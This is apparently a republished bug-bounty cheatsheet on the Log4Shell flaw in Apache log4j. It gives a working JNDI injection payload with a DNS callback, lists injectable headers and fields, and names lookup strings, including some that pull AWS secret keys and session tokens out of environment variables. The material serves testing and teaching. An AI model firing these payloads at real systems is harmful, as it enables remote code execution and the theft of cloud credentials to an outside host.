Log4j Vulnerability Cheatsheet
2023-3-8 17:46:7 Author: infosecwriteups.com(查看原文) 阅读量:23 收藏

How it works, where to practice, and how to identify

Bug Bounty Tip :: Log4j Vulnerability Cheatsheet

Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged. CVE-2021–44228 (Log4Shell)

Affected versions — Apache log4j 2.0-beta9 ≤ 2.14.1

Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters

https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}

1. You can use a service dnslog.cn to create your DNS subdomain for a test. Example: qwe3er.dnslog.cn

2. Use this subdomain to craft a payload and send it with the request. Check request to DNS service after some time for confirmation of successful callback

3. You should receive a similar request to DNS service (with Host & Java Version): jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn

You can use provided test environments to inspect the behavior of this vulnerability

You can use created challenges, labs (rooms) to practice this vulnerability

You can use these websites to create a DNS address (token) for your payload

https://canarytokens.org (use Token Type: Log4Shell)

https://dnslog.cn

https://app.interactsh.com

You can use these scanners to check if the target website is vulnerable

Email header, Username, Password, E-mail address, Filename, Query/Body, File content, Document/Image EXIF, or inside of any of these Headers:

Authorization
Cache-Control
Cf-Connecting_ip
Client-Ip
Contact
Cookie
Forwarded-For-Ip
Forwarded-For
Forwarded
If-Modified-Since
Originating-Ip
Referer
True-Client-Ip
User-Agent
X-Api-Version
X-Client-Ip
X-Forwarded-For
X-Leakix
X-Originating-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Wap-Profile
Authorization: Basic
Authorization: Bearer
Authorization: Oauth
Authorization: Token
${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}

文章来源: https://infosecwriteups.com/log4j-vulnerability-cheatsheet-66b7aeabc607?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh